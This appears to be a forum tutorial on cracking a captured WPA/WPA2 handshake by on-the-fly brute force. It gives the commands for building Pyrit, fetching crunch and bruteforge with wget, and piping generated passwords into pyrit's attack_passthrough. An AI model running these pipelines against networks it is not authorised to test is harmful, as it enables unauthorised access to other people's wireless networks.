So what are you going to do if your word list does not have the password?
Here is a how-to for cracking the WPA/WPA2 by brute forcing on the-fly.
First of all make sure you have your wpa handshake that you have have acquired from the AP by using the aircrack-ng suit.
We will be using Pyrit;
http://code.google.com/p/pyrit/ for most of our work here.
Pyrit allows to create massive databases, pre-computing part of the WPA/WPA2-PSK authentication phase in a space-time-tradeoff. It has CUDA and Opencl support, which we can use our more powerfull and cheaper GPU that are at most 100 times faster than the CPU
Lets install the needed packages first:
Code:
sudo apt-get install subversion python-dev libssl-dev zlib1g-dev
Now Lets Compile the latest SVN of Pyrit:
Code:
sudo svn checkout http://pyrit.googlecode.com/svn/trunk/ pyrit-read-only
cd pyrit-read-only/pyrit
sudo python setup.py build
sudo python setup.py install
If you have an NVidia or ATi gpu make sure you compile the extension modules as well
A good thing to do first is strip all the unnessary packets that are in the .cap file
this would make the cracking much faster if the original .cap file was large
Code:
pyrit -r "large_dumps_*.pcap" -e MyNetwork -o tiny_dump_MyNetwork.cap strip
Now we compile a program called crunch:
Code:
wget http://www.darkc0de.com/c0de/c/crunch.txt -O crunch.c
gcc -c crunch.c
gcc -lm -o crunch crunch.o
crunch will do an stdout, so you can pipe results into pyrit
Now we are all ready to do some cracking, so make you sure you run these next examples from the place you compiled crunch!
Examples:
Code:
./crunch 8 8 0123456789 | pyrit -r wpa.cap -e "AP Name" -i - attack_passthrough
This would generate every numeric combination using numbers 0-9 with a length of 8
Code:
./crunch 8 8 abcdefghijklmnopqrstuvwxyz | pyrit -r wpa.cap -e "AP Name" -i - attack_passthrough
Same as above but using lower case letters
Lets say you know the password is admin and 3 unknown numbers, so here is what you do:
Code:
./crunch 8 8 0123456789 -t admin@@@ | pyrit -r wpa.cap -e "AP Name" -i - attack_passthrough
so only those @' will change with every number combo
Here is an example to use all from length 8 to 63 (lol)
Code:
./crunch 8 63 0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ | pyrit -r wpa.cap -e "AP Name" -i - attack_passthrough
To bad crunch lacks the special characters (?!"#$%&'()*+,-./:;<=>?[\]^_`{|}~)
There is another alternative program called bruteforge:
http://masterzorag.blogspot.com/This program has more options, but bruteforge does NOT compute all chars combinations, it skips ahead when a condition is verified;
Get:
Code:
wget http://mz03.netfirms.com/py/bruteforge -O bruteforge.py
Examples:
Code:
python bruteforge.py bruteforge -c 2 -a 00000000 -m 10 | pyrit -r wpa.cap -e "AP Name" -i - attack_passthrough
This will generate a numeric string from len 8 to 9
Code:
python bruteforge.py bruteforge -a aaaaaaaa -m 10 | pyrit -r wpa.cap -e "AP Name" -i - attack_passthrough
Same as above but using lower case letters
Notes: You can compute with all characters by using the -c 6 function with bruteforge, also you use the import_passwords instead of attack_passthrough for inserting generated strings into a database you have created with pyrit
example:
Code:
python bruteforge.py bruteforge -a aaaaaaaa | pyrit -i - import_passwords
Conclusion:
Well you can compute every possible combination, but it will just take time. This tutorial is just a demo, don't try this at home unless you have performance of a petaflop
